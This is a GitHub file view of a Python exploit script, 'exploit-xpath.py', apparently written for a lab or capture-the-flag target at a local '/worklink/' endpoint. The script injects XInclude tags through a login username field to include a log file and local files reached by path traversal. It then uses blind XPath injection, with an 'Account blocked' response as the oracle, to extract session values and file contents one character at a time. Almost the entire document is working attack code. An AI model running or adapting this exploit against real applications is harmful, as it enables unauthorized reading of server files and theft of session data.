-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit-xpath.py
executable file
·77 lines (65 loc) · 3.17 KB
/
exploit-xpath.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/python3
import requests
import getopt
import sys
import string
requests = requests.Session()
requests.proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
requests.headers = {"Content-Type":"application/x-www-form-urlencoded"}
def main():
retrievexpath('http://127.0.0.1', '@session', string.ascii_lowercase+string.digits)
def xinclude(url, file, parse):
# We are injecting the xInclude tag
requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
requests.post('%s/worklink/' % url,data='username=bla&password=foo')
requests.post('%s/worklink/' % url,data='username=bla&password=foo')
requests.post('%s/worklink/' % url,data='username=bla&password=foo')
requests.post('%s/worklink/' % url,data='username=bla&password=foo')
def filedump(url, filename):
# Including the profile corresponding to the username, as XML, in the logs
local_path_to_file = '../../../%s' % (filename)
xinclude(url, local_path_to_file, 'text')
xpath = '//x/text()'
charset = string.printable
# Let's retrieve the content char by char now!
retrievexpath(url, xpath, list(charset))
def evalXpath(url, data):
response = requests.post("%s/worklink/" % url, data="username=banneduser' and %s and '1'='1&password=foo"%(data))
return ("Account blocked" in response.text)
def retrievexpath(url, xpath, charset, length=None):
# First, we are blocking our IP
xinclude(url, "/var/www/html/worklink/db/login_log.php","xml")
# Now we're blocked, let's retrieve data with XPath!
# Firstly try to retrieve the length if it's not given.
if length is None:
length = 1000000
max_length = 1000000
min_length = 0
while True:
print("[?] Testing with length %s"%(length))
if(evalXpath(url, '//log[string-length(%s) < %s]' % (xpath,length))):
blength=length
length = int(length / 2) if int(length / 2) >= min_length else int(length - ((length-min_length)/2))
max_length=blength
elif(evalXpath(url, '//log[string-length(%s)=%s]' % (xpath,length))):
break
else:
blength=length
length = int(length + length/2) if int(length + length/2) <= max_length else int(length+((max_length-length) / 2))
min_length=blength
print("[+] Length is %s" % (length))
result = ""
for i in range(length):
for j in charset:
if j == "'" or ord(j) == 11 or ord(j) == 12:
continue
if(evalXpath(url, '//log[substring(%s,%s,1)=\'%s\']'%(xpath,i+1,j))):
result+=j
print("[+] Found letter %s to be : %s"%(i,j))
break
print("[+] Result : %s"%result)
if __name__ == "__main__":
main()